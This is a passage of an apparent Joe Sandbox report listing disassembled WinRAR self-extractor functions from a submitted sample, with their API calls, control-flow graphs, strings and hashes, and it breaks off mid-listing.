                                                                                      • Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0101DBF4
                                                                                      • Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0101DFD7
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0105EC90,00000800), ref: 0101DFF2
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0105EC90), ref: 0101DFFE
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0101E009
                                                                                    • _swprintf.LIBCMT ref: 0101E048
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101E05A
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0101E061
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0101E078
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0101E0C9
                                                                                    • Sleep.KERNEL32(?), ref: 0101E0F7
                                                                                    • DeleteObject.GDI32 ref: 0101E130
                                                                                    • DeleteObject.GDI32(?), ref: 0101E140
                                                                                    • CloseHandle.KERNEL32 ref: 0101E183
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 3049964643-2656992072
                                                                                    • Opcode ID: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
                                                                                    • Instruction ID: 169e5dbff5c2af2d6a366f8b436719e9cd35bf404b3d500c8d1c4dd929759af2
                                                                                    • Opcode Fuzzy Hash: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
                                                                                    • Instruction Fuzzy Hash: F761E4B1904345AFE331ABA5DD88FAB7BECBB94704F00042DFAC596188DB7E9944C761

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 812 101a6c2-101a6df FindResourceW 813 101a6e5-101a6f6 SizeofResource 812->813 814 101a7db 812->814 813->814 815 101a6fc-101a70b LoadResource 813->815 816 101a7dd-101a7e1 814->816 815->814 817 101a711-101a71c LockResource 815->817 817->814 818 101a722-101a737 GlobalAlloc 817->818 819 101a7d3-101a7d9 818->819 820 101a73d-101a746 GlobalLock 818->820 819->816 821 101a7cc-101a7cd GlobalFree 820->821 822 101a74c-101a76a call 1020320 CreateStreamOnHGlobal 820->822 821->819 825 101a7c5-101a7c6 GlobalUnlock 822->825 826 101a76c-101a78e call 101a626 822->826 825->821 826->825 831 101a790-101a798 826->831 832 101a7b3-101a7c1 831->832 833 101a79a-101a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 101a7b0 833->834 834->832
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0101A73E
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
                                                                                      • Part of subcall function 0101A626: GdipAlloc.GDIPLUS(00000010), ref: 0101A62C
                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0101A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                    • String ID: PNG
                                                                                    • API String ID: 211097158-364855578
                                                                                    • Opcode ID: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
                                                                                    • Instruction ID: e05d5d054f1fd598029e52923233c4dccdc7b72c1e9bcef851d0c4173ac94a04
                                                                                    • Opcode Fuzzy Hash: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
                                                                                    • Instruction Fuzzy Hash: 4F318F75601342AFD7219F65DC88D2B7FBCFF84661B000959F986C7218EB3AD8448BA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1038 100a69b-100a6bf call 101ec50 1041 100a6c1-100a6ce FindFirstFileW 1038->1041 1042 100a727-100a730 FindNextFileW 1038->1042 1043 100a742-100a7ff call 1010602 call 100c310 call 10115da * 3 1041->1043 1045 100a6d0-100a6e2 call 100bb03 1041->1045 1042->1043 1044 100a732-100a740 GetLastError 1042->1044 1050 100a804-100a811 1043->1050 1046 100a719-100a722 1044->1046 1052 100a6e4-100a6fc FindFirstFileW 1045->1052 1053 100a6fe-100a707 GetLastError 1045->1053 1046->1050 1052->1043 1052->1053 1055 100a717 1053->1055 1056 100a709-100a70c 1053->1056 1055->1046 1056->1055 1058 100a70e-100a711 1056->1058 1058->1055 1061 100a713-100a715 1058->1061 1061->1046
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
                                                                                      • Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A728
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0100A592,000000FF,?,?), ref: 0100A734
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 42610566-0
                                                                                    • Opcode ID: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
                                                                                    • Instruction ID: 82c9a94e331b1a8179dbaa81df9ac3a2e6ae24bb7387d15eb40314522a7b4148
                                                                                    • Opcode Fuzzy Hash: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
                                                                                    • Instruction Fuzzy Hash: 56412F76600615EBDB26DF68CC84AE9B7B8FB48350F144196E59ED3240D7346E94CF90
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E0F
                                                                                    • TerminateProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E16
                                                                                    • ExitProcess.KERNEL32 ref: 01027E28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
                                                                                    • Instruction ID: ae39228f06da8265e714d8c693e5ad332db803b3f5f0ebbb7755172de69e6e96
                                                                                    • Opcode Fuzzy Hash: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
                                                                                    • Instruction Fuzzy Hash: 2FE04F31000154ABCF126F54C988A89BF69FB24341B004454F8898A136CB3ADD51DB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: e5dd4ff5a692169f0eb4c41e4a25fcc54990332e17e4080a8518e74c8a47b804
                                                                                    • Instruction ID: 1d3ccae0047f45bdf272886294366b4efea02d71dc036bfcf140d33b340f05a1
                                                                                    • Opcode Fuzzy Hash: e5dd4ff5a692169f0eb4c41e4a25fcc54990332e17e4080a8518e74c8a47b804
                                                                                    • Instruction Fuzzy Hash: D082C870D04246AEFF57DB68C894BFABBA9BF15200F0881FAD9C95B1C2D7715684CB60
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0101B7E5
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101B8D1
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B8EF
                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0101B902
                                                                                    • TranslateMessage.USER32(?), ref: 0101B910
                                                                                    • DispatchMessageW.USER32(?), ref: 0101B91A
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0101B93D
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0101B960
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0101B983
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101B99E
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101B9B1
                                                                                      • Part of subcall function 0101D453: _wcslen.LIBCMT ref: 0101D47D
                                                                                    • SetFocus.USER32(00000000), ref: 0101B9B8
                                                                                    • _swprintf.LIBCMT ref: 0101BA24
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                      • Part of subcall function 0101D4D4: GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
                                                                                      • Part of subcall function 0101D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
                                                                                      • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0101BA68
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0101BA90
                                                                                    • GetTickCount.KERNEL32 ref: 0101BAAE
                                                                                    • _swprintf.LIBCMT ref: 0101BAC2
                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0101BAF4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0101BB43
                                                                                    • _swprintf.LIBCMT ref: 0101BB7C
                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0101BBD0
                                                                                    • GetCommandLineW.KERNEL32 ref: 0101BBEA
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0101BC47
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0101BC6F
                                                                                    • Sleep.KERNEL32(00000064), ref: 0101BCB9
                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0101BCE2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0101BCEB
                                                                                    • _swprintf.LIBCMT ref: 0101BD1E
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BD7D
                                                                                    • SetDlgItemTextW.USER32(?,00000065,010335F4), ref: 0101BD94
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0101BD9D
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0101BDAC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0101BDBB
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BE68
                                                                                    • _wcslen.LIBCMT ref: 0101BEBE
                                                                                    • _swprintf.LIBCMT ref: 0101BEE8
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0101BF32
                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0101BF4C
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0101BF55
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0101BF6B
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0101BF85
                                                                                    • SetWindowTextW.USER32(00000000,0104A472), ref: 0101BFA7
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0101C007
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C01A
                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0101C0BD
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0101C197
                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0101C1D9
                                                                                      • Part of subcall function 0101C73F: __EH_prolog.LIBCMT ref: 0101C744
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C1FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 3445078344-311033401
                                                                                    • Opcode ID: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
                                                                                    • Instruction ID: 3ca8557b03994eac0f4a78719fc2f2576b3f7e2568d545669a07dc4b5598366f
                                                                                    • Opcode Fuzzy Hash: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
                                                                                    • Instruction Fuzzy Hash: F242FC70944245BBFB329BA4DD49FBE7BBCAB41700F004099F6C5AA0C9CB7E9944CB61

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 268 1010863-1010886 call 101ec50 GetModuleHandleW 271 10108e7-1010b48 268->271 272 1010888-101089f GetProcAddress 268->272 273 1010c14-1010c40 GetModuleFileNameW call 100c29a call 1010602 271->273 274 1010b4e-1010b59 call 10275fb 271->274 275 10108a1-10108b7 272->275 276 10108b9-10108c9 GetProcAddress 272->276 291 1010c42-1010c4e call 100b146 273->291 274->273 286 1010b5f-1010b8d GetModuleFileNameW CreateFileW 274->286 275->276 277 10108e5 276->277 278 10108cb-10108e0 276->278 277->271 278->277 288 1010c08-1010c0f CloseHandle 286->288 289 1010b8f-1010b9b SetFilePointer 286->289 288->273 289->288 292 1010b9d-1010bb9 ReadFile 289->292 298 1010c50-1010c5b call 101081b 291->298 299 1010c7d-1010ca4 call 100c310 GetFileAttributesW 291->299 292->288 294 1010bbb-1010be0 292->294 295 1010bfd-1010c06 call 1010371 294->295 295->288 305 1010be2-1010bfc call 101081b 295->305 298->299 307 1010c5d-1010c7b CompareStringW 298->307 308 1010ca6-1010caa 299->308 309 1010cae 299->309 305->295 307->299 307->308 308->291 311 1010cac 308->311 312 1010cb0-1010cb5 309->312 311->312 313 1010cb7 312->313 314 1010cec-1010cee 312->314 317 1010cb9-1010ce0 call 100c310 GetFileAttributesW 313->317 315 1010cf4-1010d0b call 100c2e4 call 100b146 314->315 316 1010dfb-1010e05 314->316 327 1010d73-1010da6 call 1004092 AllocConsole 315->327 328 1010d0d-1010d6e call 101081b * 2 call 100e617 call 1004092 call 100e617 call 101a7e4 315->328 323 1010ce2-1010ce6 317->323 324 1010cea 317->324 323->317 326 1010ce8 323->326 324->314 326->314 333 1010df3-1010df5 ExitProcess 327->333 334 1010da8-1010ded GetCurrentProcessId AttachConsole call 1023e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010B69
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01010B83
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010B93
                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,01033C7C,00000000), ref: 01010BB1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 01010C09
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010C1E
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01033C7C,?,00000000,?,00000800), ref: 01010C72
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,01033C7C,00000800,?,00000000,?,00000800), ref: 01010C9C
                                                                                    • GetFileAttributesW.KERNEL32(?,?,01033D44,00000800), ref: 01010CD8
                                                                                      • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                                                      • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                                                    • _swprintf.LIBCMT ref: 01010D4A
                                                                                    • _swprintf.LIBCMT ref: 01010D96
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    • AllocConsole.KERNEL32 ref: 01010D9E
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 01010DA8
                                                                                    • AttachConsole.KERNEL32(00000000), ref: 01010DAF
                                                                                    • _wcslen.LIBCMT ref: 01010DC4
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010DD5
                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 01010DDC
                                                                                    • Sleep.KERNEL32(00002710), ref: 01010DE7
                                                                                    • FreeConsole.KERNEL32 ref: 01010DED
                                                                                    • ExitProcess.KERNEL32 ref: 01010DF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                    • API String ID: 1207345701-3298887752
                                                                                    • Opcode ID: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
                                                                                    • Instruction ID: a00075720e099a0a5763cc4b07fda85e429c3e1a2598b1ee9b278207c0abeed2
                                                                                    • Opcode Fuzzy Hash: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
                                                                                    • Instruction Fuzzy Hash: 1ED16EB1108385AFD235AF55D888BDFBAECBBC5704F40491DF6C99E144CB398589CBA2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 347 101c73f-101c757 call 101eb78 call 101ec50 352 101d40d-101d418 347->352 353 101c75d-101c787 call 101b314 347->353 353->352 356 101c78d-101c792 353->356 357 101c793-101c7a1 356->357 358 101c7a2-101c7b7 call 101af98 357->358 361 101c7b9 358->361 362 101c7bb-101c7d0 call 1011fbb 361->362 365 101c7d2-101c7d6 362->365 366 101c7dd-101c7e0 362->366 365->362 367 101c7d8 365->367 368 101c7e6 366->368 369 101d3d9-101d404 call 101b314 366->369 367->369 371 101c7ed-101c7f0 368->371 372 101ca7c-101ca7e 368->372 373 101ca5f-101ca61 368->373 374 101c9be-101c9c0 368->374 369->357 381 101d40a-101d40c 369->381 371->369 379 101c7f6-101c850 call 101a64d call 100bdf3 call 100a544 call 100a67e call 1006edb 371->379 372->369 377 101ca84-101ca8b 372->377 373->369 375 101ca67-101ca77 SetWindowTextW 373->375 374->369 378 101c9c6-101c9d2 374->378 375->369 377->369 382 101ca91-101caaa 377->382 383 101c9d4-101c9e5 call 1027686 378->383 384 101c9e6-101c9eb 378->384 436 101c98f-101c9a4 call 100a5d1 379->436 381->352 389 101cab2-101cac0 call 1023e13 382->389 390 101caac 382->390 383->384 387 101c9f5-101ca00 call 101b48e 384->387 388 101c9ed-101c9f3 384->388 394 101ca05-101ca07 387->394 388->394 389->369 401 101cac6-101cacf 389->401 390->389 399 101ca12-101ca32 call 1023e13 call 1023e3e 394->399 400 101ca09-101ca10 call 1023e13 394->400 421 101ca34-101ca3b 399->421 422 101ca4b-101ca4d 399->422 400->399 405 101cad1-101cad5 401->405 406 101caf8-101cafb 401->406 410 101cb01-101cb04 405->410 411 101cad7-101cadf 405->411 406->410 413 101cbe0-101cbee call 1010602 406->413 418 101cb11-101cb2c 410->418 419 101cb06-101cb0b 410->419 411->369 416 101cae5-101caf3 call 1010602 411->416 429 101cbf0-101cc04 call 102279b 413->429 416->429 437 101cb76-101cb7d 418->437 438 101cb2e-101cb68 418->438 419->413 419->418 426 